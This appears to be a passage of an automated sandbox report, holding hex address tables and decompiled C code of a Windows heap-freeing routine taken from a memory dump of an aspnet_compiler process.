                          0x014b48bc
                          0x014b48be
                          0x014b48c1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b48c3
                          0x014b48c3
                          0x014b48c6
                          0x014b48c9
                          0x014b48cc
                          0x014b48d1
                          0x014b48d4
                          0x00000000
                          0x00000000
                          0x014b48d6
                          0x014b48d7
                          0x014b48da
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b48da
                          0x014b494f
                          0x014b4955
                          0x014b4959
                          0x014b4978
                          0x014b497d
                          0x014b495b
                          0x014b4970
                          0x014b4975
                          0x014b4986
                          0x014b4987
                          0x014b498a
                          0x014b498d
                          0x014b4997
                          0x014b47ef
                          0x014b47ef
                          0x014b47ef
                          0x00000000
                          0x014b47ef
                          0x014b4890
                          0x014b4890
                          0x014b4891
                          0x014b4891
                          0x014b4894
                          0x014b4897
                          0x014b489d
                          0x014b48a0
                          0x00000000
                          0x00000000
                          0x014b48a2
                          0x014b48a3
                          0x014b48a6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b48a6
                          0x014b48fb
                          0x014b4901
                          0x014b4905
                          0x014b4924
                          0x014b4929
                          0x014b4907
                          0x014b491c
                          0x014b4921
                          0x014b492f
                          0x014b4935
                          0x014b4936
                          0x014b4939
                          0x014b4942
                          0x00000000
                          0x014b4947
                          0x014b4835
                          0x014b483b
                          0x014b483f
                          0x014b485e
                          0x014b4863
                          0x014b4841
                          0x014b4856
                          0x014b485b
                          0x014b4869
                          0x014b486c
                          0x014b486f
                          0x014b47e7
                          0x014b47e7
                          0x00000000
                          0x014b47ec
                          0x014b47aa
                          0x014b47b0
                          0x014b47b4
                          0x014b47d3
                          0x014b47d8
                          0x014b47b6
                          0x014b47cb
                          0x014b47d0
                          0x014b47de
                          0x014b47df
                          0x014b47e2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b476f
                          0x014b476f
                          0x014b4778
                          0x014b4785
                          0x014b4787
                          0x014b478c
                          0x014b478e
                          0x00000000
                          0x00000000
                          0x014b4790
                          0x014b4792
                          0x014b4794
                          0x00000000
                          0x00000000
                          0x014b4796
                          0x014b4799
                          0x00000000
                          0x014b4799
                          0x00000000
                          0x014b45c3
                          0x014b45c3
                          0x014b45c7
                          0x014b45c7
                          0x014b45ca
                          0x014b45cf
                          0x014b45d3
                          0x014b45df
                          0x014b45e4
                          0x014b45e6
                          0x014b45e8
                          0x014b45ed
                          0x014b45ed
                          0x014b45f2
                          0x014b45f2
                          0x014b45f7
                          0x014b45fc
                          0x014b4602
                          0x014b4606
                          0x014b4609
                          0x014b460f
                          0x014b46de
                          0x014b46e3
                          0x014b46e5
                          0x014b46ec
                          0x014b46ee
                          0x014b46f6
                          0x014b46f6
                          0x014b46f6
                          0x014b46f6
                          0x014b46ec
                          0x014b4615
                          0x014b4615
                          0x014b461d
                          0x014b462e
                          0x014b462e
                          0x014b461d
                          0x014b460f
                          0x014b4609
                          0x014b46fd
                          0x00000000
                          0x00000000
                          0x014b4710
                          0x014b471a
                          0x014b4720
                          0x014b4720
                          0x014b4722
                          0x014b472c
                          0x00000000
                          0x014b472e
                          0x014b472e
                          0x00000000
                          0x014b472e
                          0x014b472c
                          0x014b4738
                          0x014b473c
                          0x014b474b
                          0x014b4751
                          0x014b4751
                          0x00000000
                          0x014b473c
                          0x014b48f4
                          0x014b48f4
                          0x00000000
                          0x014b48f4

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                          • API String ID: 0-1357697941
                          • Opcode ID: 099ff485d8f232d2623545ef41b92fa9c72145698608d8d31a54c79cd9080231
                          • Instruction ID: 9bc05d6d8897453714ab7fc9ecd459a13b3655dd11b2f51a079d6f2a5cd69973
                          • Opcode Fuzzy Hash: 099ff485d8f232d2623545ef41b92fa9c72145698608d8d31a54c79cd9080231
                          • Instruction Fuzzy Hash: 96F12271600646DFDB25CF69C484BEAFBF5FF45308F08801AE28697762C734A986CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E0141A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                          				char _v8;
                          				signed short _v12;
                          				signed short _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed short _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				unsigned int _v52;
                          				signed int _v56;
                          				void* _v60;
                          				intOrPtr _v64;
                          				void* _v72;
                          				void* __ebx;
                          				void* __edi;
                          				void* __ebp;
                          				unsigned int _t246;
                          				signed char _t247;
                          				signed short _t249;
                          				unsigned int _t256;
                          				signed int _t262;
                          				signed int _t265;
                          				signed int _t266;
                          				signed int _t267;
                          				intOrPtr _t270;
                          				signed int _t280;
                          				signed int _t286;
                          				signed int _t289;
                          				intOrPtr _t290;
                          				signed int _t291;
                          				signed int _t317;
                          				signed short _t320;
                          				intOrPtr _t327;
                          				signed int _t339;
                          				signed int _t344;
                          				signed int _t347;
                          				intOrPtr _t348;
                          				signed int _t350;
                          				signed int _t352;
                          				signed int _t353;
                          				signed int _t356;
                          				intOrPtr _t357;
                          				intOrPtr _t366;
                          				signed int _t367;
                          				signed int _t370;
                          				intOrPtr _t371;
                          				signed int _t372;
                          				signed int _t394;
                          				signed short _t402;
                          				intOrPtr _t404;
                          				intOrPtr _t415;
                          				signed int _t430;
                          				signed int _t433;
                          				signed int _t437;
                          				signed int _t445;
                          				signed short _t446;
                          				signed short _t449;
                          				signed short _t452;
                          				signed int _t455;
                          				signed int _t460;
                          				signed short* _t468;
                          				signed int _t480;
                          				signed int _t481;
                          				signed int _t483;
                          				intOrPtr _t484;
                          				signed int _t491;
                          				unsigned int _t506;
                          				unsigned int _t508;
                          				signed int _t513;
                          				signed int _t514;
                          				signed int _t521;
                          				signed short* _t533;
                          				signed int _t541;
                          				signed int _t543;
                          				signed int _t546;
                          				unsigned int _t551;
                          				signed int _t553;
                          
                          				_t450 = __ecx;
                          				_t553 = __ecx;
                          				_t539 = __edx;
                          				_v28 = 0;
                          				_v40 = 0;
                          				if(( *(__ecx + 0xcc) ^  *0x14e8a68) != 0) {
                          					_push(_a4);
                          					_t513 = __edx;
                          					L11:
                          					_t246 = E0141A830(_t450, _t513);
                          					L7:
                          					return _t246;
                          				}
                          				if(_a8 != 0) {
                          					__eflags =  *(__edx + 2) & 0x00000008;
                          					if(( *(__edx + 2) & 0x00000008) != 0) {
                          						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                          						_t430 = E0141DF24(__edx,  &_v12,  &_v16);
                          						__eflags = _t430;
                          						if(_t430 != 0) {
                          							_t157 = _t553 + 0x234;
                          							 *_t157 =  *(_t553 + 0x234) - _v16;
                          							__eflags =  *_t157;
                          						}
                          					}
                          					_t445 = _a4;
                          					_t514 = _t539;
                          					_v48 = _t539;
                          					L14:
                          					_t247 =  *((intOrPtr*)(_t539 + 6));
                          					__eflags = _t247;
                          					if(_t247 == 0) {
                          						_t541 = _t553;
                          					} else {
                          						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                          						__eflags = _t541;
                          					}
                          					_t249 = 7 + _t445 * 8 + _t514;
                          					_v12 = _t249;
                          					__eflags =  *_t249 - 3;
                          					if( *_t249 == 3) {
                          						_v16 = _t514 + _t445 * 8 + 8;
                          						E013F9373(_t553, _t514 + _t445 * 8 + 8);
                          						_t452 = _v16;
                          						_v28 =  *(_t452 + 0x10);
                          						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                          						_v36 =  *(_t452 + 0x14);
                          						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                          						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                          						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                          						_t256 =  *(_t452 + 0x14);
                          						__eflags = _t256 - 0x7f000;
                          						if(_t256 >= 0x7f000) {
                          							_t142 = _t553 + 0x1ec;
                          							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                          							__eflags =  *_t142;
                          							_t256 =  *(_t452 + 0x14);
                          						}
                          						_t513 = _v48;
                          						_t445 = _t445 + (_t256 >> 3) + 0x20;
                          						_a4 = _t445;
                          						_v40 = 1;
                          					} else {
                          						_t27 =  &_v36;
                          						 *_t27 = _v36 & 0x00000000;
                          						__eflags =  *_t27;
                          					}
                          					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                          					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                          						_v44 = _t513;
                          						_t262 = E013FA9EF(_t541, _t513);
                          						__eflags = _a8;
                          						_v32 = _t262;
                          						if(_a8 != 0) {
                          							__eflags = _t262;
                          							if(_t262 == 0) {
                          								goto L19;
                          							}
                          						}
                          						__eflags =  *0x14e8748 - 1;
                          						if( *0x14e8748 >= 1) {
                          							__eflags = _t262;
                          							if(_t262 == 0) {
                          								_t415 =  *[fs:0x30];
                          								__eflags =  *(_t415 + 0xc);
                          								if( *(_t415 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          								}
                          								_push("(UCRBlock != NULL)");
                          								E013FB150();
                          								__eflags =  *0x14e7bc8;
                          								if( *0x14e7bc8 == 0) {
                          									__eflags = 1;
                          									E014B2073(_t445, 1, _t541, 1);
                          								}
                          								_t513 = _v48;
                          								_t445 = _a4;
                          							}
                          						}
                          						_t350 = _v40;
                          						_t480 = _t445 << 3;
                          						_v20 = _t480;
                          						_t481 = _t480 + _t513;
                          						_v24 = _t481;
                          						__eflags = _t350;
                          						if(_t350 == 0) {
                          							_t481 = _t481 + 0xfffffff0;
                          							__eflags = _t481;
                          						}
                          						_t483 = (_t481 & 0xfffff000) - _v44;
                          						__eflags = _t483;
                          						_v52 = _t483;
                          						if(_t483 == 0) {
                          							__eflags =  *0x14e8748 - 1;
                          							if( *0x14e8748 < 1) {
                          								goto L9;
                          							}
                          							__eflags = _t350;
                          							goto L146;
                          						} else {
                          							_t352 = E0142174B( &_v44,  &_v52, 0x4000);
                          							__eflags = _t352;
                          							if(_t352 < 0) {
                          								goto L94;
                          							}
                          							_t353 = E01417D50();
                          							_t447 = 0x7ffe0380;
                          							__eflags = _t353;
                          							if(_t353 != 0) {
                          								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          							} else {
                          								_t356 = 0x7ffe0380;
                          							}
                          							__eflags =  *_t356;
                          							if( *_t356 != 0) {
                          								_t357 =  *[fs:0x30];
                          								__eflags =  *(_t357 + 0x240) & 0x00000001;
                          								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                          									E014B14FB(_t447, _t553, _v44, _v52, 5);
                          								}
                          							}
                          							_t358 = _v32;
                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                          							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                          							__eflags = _t484 - 0x7f000;
                          							if(_t484 >= 0x7f000) {
                          								_t90 = _t553 + 0x1ec;
                          								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                          								__eflags =  *_t90;
                          							}
                          							E013F9373(_t553, _t358);
                          							_t486 = _v32;
                          							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                          							E013F9819(_t486);
                          							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                          							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                          							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                          							__eflags = _t366 - 0x7f000;
                          							if(_t366 >= 0x7f000) {
                          								_t104 = _t553 + 0x1ec;
                          								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                          								__eflags =  *_t104;
                          							}
                          							__eflags = _v40;
                          							if(_v40 == 0) {
                          								_t533 = _v52 + _v44;
                          								_v32 = _t533;
                          								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                          								__eflags = _v24 - _v52 + _v44;
                          								if(_v24 == _v52 + _v44) {
                          									__eflags =  *(_t553 + 0x4c);
                          									if( *(_t553 + 0x4c) != 0) {
                          										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                          										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                          									}
                          								} else {
                          									_t449 = 0;
                          									_t533[3] = 0;
                          									_t533[1] = 0;
                          									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                          									_t491 = _t394;
                          									 *_t533 = _t394;
                          									__eflags =  *0x14e8748 - 1; // 0x0
                          									if(__eflags >= 0) {
                          										__eflags = _t491 - 1;
                          										if(_t491 <= 1) {
                          											_t404 =  *[fs:0x30];
                          											__eflags =  *(_t404 + 0xc);
                          											if( *(_t404 + 0xc) == 0) {
                          												_push("HEAP: ");
                          												E013FB150();
                          											} else {
                          												E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          											}
                          											_push("((LONG)FreeEntry->Size > 1)");
                          											E013FB150();
                          											_pop(_t491);
                          											__eflags =  *0x14e7bc8 - _t449; // 0x0
                          											if(__eflags == 0) {
                          												__eflags = 0;
                          												_t491 = 1;
                          												E014B2073(_t449, 1, _t541, 0);
                          											}
                          											_t533 = _v32;
                          										}
                          									}
                          									_t533[1] = _t449;
                          									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                          									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                          										_t402 = (_t533 - _t541 >> 0x10) + 1;
                          										_v16 = _t402;
                          										__eflags = _t402 - 0xfe;
                          										if(_t402 >= 0xfe) {
                          											_push(_t491);
                          											_push(_t449);
                          											E014BA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                          											_t533 = _v48;
                          											_t402 = _v32;
                          										}
                          										_t449 = _t402;
                          									}
                          									_t533[3] = _t449;
                          									E0141A830(_t553, _t533,  *_t533 & 0x0000ffff);
                          									_t447 = 0x7ffe0380;
                          								}
                          							}
                          							_t367 = E01417D50();
                          							__eflags = _t367;
                          							if(_t367 != 0) {
                          								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          							} else {
                          								_t370 = _t447;
                          							}
                          							__eflags =  *_t370;
                          							if( *_t370 != 0) {
                          								_t371 =  *[fs:0x30];
                          								__eflags =  *(_t371 + 0x240) & 1;
                          								if(( *(_t371 + 0x240) & 1) != 0) {
                          									__eflags = E01417D50();
                          									if(__eflags != 0) {
                          										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          									}
                          									E014B1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                          								}
                          							}
                          							_t372 = E01417D50();
                          							_t546 = 0x7ffe038a;
                          							_t446 = 0x230;
                          							__eflags = _t372;
                          							if(_t372 != 0) {
                          								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          							} else {
                          								_t246 = 0x7ffe038a;
                          							}
                          							__eflags =  *_t246;
                          							if( *_t246 == 0) {
                          								goto L7;
                          							} else {
                          								__eflags = E01417D50();
                          								if(__eflags != 0) {
                          									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                          									__eflags = _t546;
                          								}
                          								_push( *_t546 & 0x000000ff);
                          								_push(_v36);
                          								_push(_v40);
                          								goto L120;
                          							}
                          						}
                          					} else {
                          						L19:
                          						_t31 = _t513 + 0x101f; // 0x101f
                          						_t455 = _t31 & 0xfffff000;
                          						_t32 = _t513 + 0x28; // 0x28
                          						_v44 = _t455;
                          						__eflags = _t455 - _t32;
                          						if(_t455 == _t32) {
                          							_t455 = _t455 + 0x1000;
                          							_v44 = _t455;
                          						}
                          						_t265 = _t445 << 3;
                          						_v24 = _t265;
                          						_t266 = _t265 + _t513;
                          						__eflags = _v40;
                          						_v20 = _t266;
                          						if(_v40 == 0) {
                          							_t266 = _t266 + 0xfffffff0;
                          							__eflags = _t266;
                          						}
                          						_t267 = _t266 & 0xfffff000;
                          						_v52 = _t267;
                          						__eflags = _t267 - _t455;
                          						if(_t267 < _t455) {
                          							__eflags =  *0x14e8748 - 1; // 0x0
                          							if(__eflags < 0) {
                          								L9:
                          								_t450 = _t553;
                          								L10:
                          								_push(_t445);
                          								goto L11;
                          							}
                          							__eflags = _v40;
                          							L146:
                          							if(__eflags == 0) {
                          								goto L9;
                          							}
                          							_t270 =  *[fs:0x30];
                          							__eflags =  *(_t270 + 0xc);
                          							if( *(_t270 + 0xc) == 0) {
                          								_push("HEAP: ");
                          								E013FB150();
                          							} else {
                          								E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          							}
                          							_push("(!TrailingUCR)");
                          							E013FB150();
                          							__eflags =  *0x14e7bc8;
                          							if( *0x14e7bc8 == 0) {
                          								__eflags = 0;
                          								E014B2073(_t445, 1, _t541, 0);
                          							}
                          							L152:
                          							_t445 = _a4;
                          							L153:
                          							_t513 = _v48;
                          							goto L9;
                          						}
                          						_v32 = _t267;
                          						_t280 = _t267 - _t455;
                          						_v32 = _v32 - _t455;
                          						__eflags = _a8;
                          						_t460 = _v32;
                          						_v52 = _t460;
                          						if(_a8 != 0) {
                          							L27:
                          							__eflags = _t280;
                          							if(_t280 == 0) {
                          								L33:
                          								_t446 = 0;
                          								__eflags = _v40;
                          								if(_v40 == 0) {
                          									_t468 = _v44 + _v52;
                          									_v36 = _t468;
                          									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                          									__eflags = _v20 - _v52 + _v44;
                          									if(_v20 == _v52 + _v44) {
                          										__eflags =  *(_t553 + 0x4c);
                          										if( *(_t553 + 0x4c) != 0) {
                          											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                          											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                          										}
                          									} else {
                          										_t468[3] = 0;
                          										_t468[1] = 0;
                          										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                          										_t521 = _t317;
                          										 *_t468 = _t317;
                          										__eflags =  *0x14e8748 - 1; // 0x0
                          										if(__eflags >= 0) {
                          											__eflags = _t521 - 1;
                          											if(_t521 <= 1) {
                          												_t327 =  *[fs:0x30];
                          												__eflags =  *(_t327 + 0xc);
                          												if( *(_t327 + 0xc) == 0) {
                          													_push("HEAP: ");
                          													E013FB150();
                          												} else {
                          													E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          												}
                          												_push("(LONG)FreeEntry->Size > 1");
                          												E013FB150();
                          												__eflags =  *0x14e7bc8 - _t446; // 0x0
                          												if(__eflags == 0) {
                          													__eflags = 1;
                          													E014B2073(_t446, 1, _t541, 1);
                          												}
                          												_t468 = _v36;
                          											}
                          										}
                          										_t468[1] = _t446;
                          										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                          										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                          										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                          											_t320 = _t446;
                          										} else {
                          											_t320 = (_t468 - _t541 >> 0x10) + 1;
                          											_v12 = _t320;
                          											__eflags = _t320 - 0xfe;
                          											if(_t320 >= 0xfe) {
                          												_push(_t468);
                          												_push(_t446);
                          												E014BA80D(_t522, 3, _t468, _t541);
                          												_t468 = _v52;
                          												_t320 = _v28;
                          											}
                          										}
                          										_t468[3] = _t320;
                          										E0141A830(_t553, _t468,  *_t468 & 0x0000ffff);
                          									}
                          								}
                          								E0141B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                          								E0141A830(_t553, _v64, _v24);
                          								_t286 = E01417D50();
                          								_t542 = 0x7ffe0380;
                          								__eflags = _t286;
                          								if(_t286 != 0) {
                          									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          								} else {
                          									_t289 = 0x7ffe0380;
                          								}
                          								__eflags =  *_t289;
                          								if( *_t289 != 0) {
                          									_t290 =  *[fs:0x30];
                          									__eflags =  *(_t290 + 0x240) & 1;
                          									if(( *(_t290 + 0x240) & 1) != 0) {
                          										__eflags = E01417D50();
                          										if(__eflags != 0) {
                          											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          										}
                          										E014B1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                          									}
                          								}
                          								_t291 = E01417D50();
                          								_t543 = 0x7ffe038a;
                          								__eflags = _t291;
                          								if(_t291 != 0) {
                          									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          								} else {
                          									_t246 = 0x7ffe038a;
                          								}
                          								__eflags =  *_t246;
                          								if( *_t246 != 0) {
                          									__eflags = E01417D50();
                          									if(__eflags != 0) {
                          										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          										__eflags = _t543;
                          									}
                          									_push( *_t543 & 0x000000ff);
                          									_push(_t446);
                          									_push(_t446);
                          									L120:
                          									_push( *(_t553 + 0x74) << 3);
                          									_push(_v52);
                          									_t246 = E014B1411(_t446, _t553, _v44, __eflags);
                          								}
                          								goto L7;
                          							}
                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                          							_t339 = E0142174B( &_v44,  &_v52, 0x4000);
                          							__eflags = _t339;
                          							if(_t339 < 0) {
                          								L94:
                          								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                          								__eflags = _v40;
                          								if(_v40 == 0) {
                          									goto L153;
                          								}
                          								E0141B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                          								goto L152;
                          							}
                          							_t344 = E01417D50();
                          							__eflags = _t344;
                          							if(_t344 != 0) {
                          								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          							} else {
                          								_t347 = 0x7ffe0380;
                          							}
                          							__eflags =  *_t347;
                          							if( *_t347 != 0) {
                          								_t348 =  *[fs:0x30];
                          								__eflags =  *(_t348 + 0x240) & 1;
                          								if(( *(_t348 + 0x240) & 1) != 0) {
                          									E014B14FB(_t445, _t553, _v44, _v52, 6);
                          								}
                          							}
                          							_t513 = _v48;
                          							goto L33;
                          						}
                          						__eflags =  *_v12 - 3;
                          						_t513 = _v48;
                          						if( *_v12 == 3) {
                          							goto L27;
                          						}
                          						__eflags = _t460;
                          						if(_t460 == 0) {
                          							goto L9;
                          						}
                          						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                          						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                          							goto L9;
                          						}
                          						goto L27;
                          					}
                          				}
                          				_t445 = _a4;
                          				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                          					_t513 = __edx;
                          					goto L10;
                          				}
                          				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                          				_v20 = _t433;
                          				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                          					_t513 = _t539;
                          					goto L9;
                          				} else {
                          					_t437 = E014199BF(__ecx, __edx,  &_a4, 0);
                          					_t445 = _a4;
                          					_t514 = _t437;
                          					_v56 = _t514;
                          					if(_t445 - 0x201 > 0xfbff) {
                          						goto L14;
                          					} else {
                          						E0141A830(__ecx, _t514, _t445);
                          						_t506 =  *(_t553 + 0x238);
                          						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                          						_t246 = _t506 >> 4;
                          						if(_t551 < _t506 - _t246) {
                          							_t508 =  *(_t553 + 0x23c);
                          							_t246 = _t508 >> 2;
                          							__eflags = _t551 - _t508 - _t246;
                          							if(_t551 > _t508 - _t246) {
                          								_t246 = E0142ABD8(_t553);
                          								 *(_t553 + 0x23c) = _t551;
                          								 *(_t553 + 0x238) = _t551;
                          							}
                          						}
                          						goto L7;
                          					}
                          				}
                          			}



















































































                          0x0141a309
                          0x0141a316
                          0x0141a319
                          0x0141a31d
                          0x0141a32d
                          0x0141a331
                          0x01461e0d
                          0x01461e10
                          0x0141a3cb
                          0x0141a3cb
                          0x0141a3bd
                          0x0141a3c3
                          0x0141a3c3
                          0x0141a33a
                          0x01461e17
                          0x01461e1b
                          0x01461e1d
                          0x01461e2f
                          0x01461e34
                          0x01461e36
                          0x01461e3c
                          0x01461e3c
                          0x01461e3c
                          0x01461e3c
                          0x01461e36
                          0x01461e42
                          0x01461e45
                          0x01461e47
                          0x0141a3f8
                          0x0141a3f8
                          0x0141a3fb
                          0x0141a3fd
                          0x01461e50
                          0x0141a403
                          0x0141a411
                          0x0141a411
                          0x0141a411
                          0x0141a41e
                          0x0141a420
                          0x0141a424
                          0x0141a427
                          0x0141a7c9
                          0x0141a7cd
                          0x0141a7d2
                          0x0141a7d9
                          0x0141a7e0
                          0x0141a7e3
                          0x0141a7ed
                          0x0141a7f3
                          0x0141a7f9
                          0x0141a7ff
                          0x0141a802
                          0x0141a807
                          0x0141a809
                          0x0141a809
                          0x0141a809
                          0x0141a80f
                          0x0141a80f
                          0x0141a812
                          0x0141a81c
                          0x0141a821
                          0x0141a824
                          0x0141a42d
                          0x0141a42d
                          0x0141a42d
                          0x0141a42d
                          0x0141a42d
                          0x0141a436
                          0x0141a43a
                          0x0141a609
                          0x0141a60d
                          0x0141a612
                          0x0141a616
                          0x0141a61a
                          0x01461e57
                          0x01461e59
                          0x00000000
                          0x00000000
                          0x01461e5f
                          0x0141a620
                          0x0141a627
                          0x01461e64
                          0x01461e66
                          0x01461e6c
                          0x01461e72
                          0x01461e76
                          0x01461e95
                          0x01461e9a
                          0x01461e78
                          0x01461e8d
                          0x01461e92
                          0x01461ea0
                          0x01461ea5
                          0x01461eaa
                          0x01461eb2
                          0x01461eb6
                          0x01461eb9
                          0x01461eb9
                          0x01461ebe
                          0x01461ec2
                          0x01461ec2
                          0x01461e66
                          0x0141a62d
                          0x0141a633
                          0x0141a636
                          0x0141a63a
                          0x0141a63c
                          0x0141a640
                          0x0141a642
                          0x0141a644
                          0x0141a644
                          0x0141a644
                          0x0141a64d
                          0x0141a64d
                          0x0141a651
                          0x0141a655
                          0x01461eca
                          0x01461ed1
                          0x00000000
                          0x00000000
                          0x01461ed7
                          0x00000000
                          0x0141a65b
                          0x0141a669
                          0x0141a66e
                          0x0141a670
                          0x00000000
                          0x00000000
                          0x0141a676
                          0x0141a67b
                          0x0141a680
                          0x0141a682
                          0x01461f1a
                          0x0141a688
                          0x0141a688
                          0x0141a688
                          0x0141a68a
                          0x0141a68d
                          0x01461f24
                          0x01461f2a
                          0x01461f31
                          0x01461f43
                          0x01461f43
                          0x01461f31
                          0x0141a693
                          0x0141a697
                          0x0141a69d
                          0x0141a6a0
                          0x0141a6a6
                          0x0141a6a8
                          0x0141a6a8
                          0x0141a6a8
                          0x0141a6a8
                          0x0141a6b2
                          0x0141a6b7
                          0x0141a6c1
                          0x0141a6c6
                          0x0141a6d2
                          0x0141a6d9
                          0x0141a6e3
                          0x0141a6e6
                          0x0141a6eb
                          0x0141a6ed
                          0x0141a6ed
                          0x0141a6ed
                          0x0141a6ed
                          0x0141a6f3
                          0x0141a6f8
                          0x0141a702
                          0x0141a70a
                          0x0141a70e
                          0x0141a71a
                          0x0141a71e
                          0x01461fcb
                          0x01461fcf
                          0x01461fdd
                          0x01461fe3
                          0x01461fe3
                          0x0141a724
                          0x0141a728
                          0x0141a72a
                          0x0141a72d
                          0x0141a737
                          0x0141a73a
                          0x0141a73c
                          0x0141a742
                          0x0141a748
                          0x01461f4d
                          0x01461f50
                          0x01461f56
                          0x01461f5c
                          0x01461f5f
                          0x01461f7e
                          0x01461f83
                          0x01461f61
                          0x01461f76
                          0x01461f7b
                          0x01461f89
                          0x01461f8e
                          0x01461f93
                          0x01461f94
                          0x01461f9a
                          0x01461f9c
                          0x01461f9e
                          0x01461fa1
                          0x01461fa1
                          0x01461fa6
                          0x01461fa6
                          0x01461f50
                          0x0141a74e
                          0x0141a751
                          0x0141a754
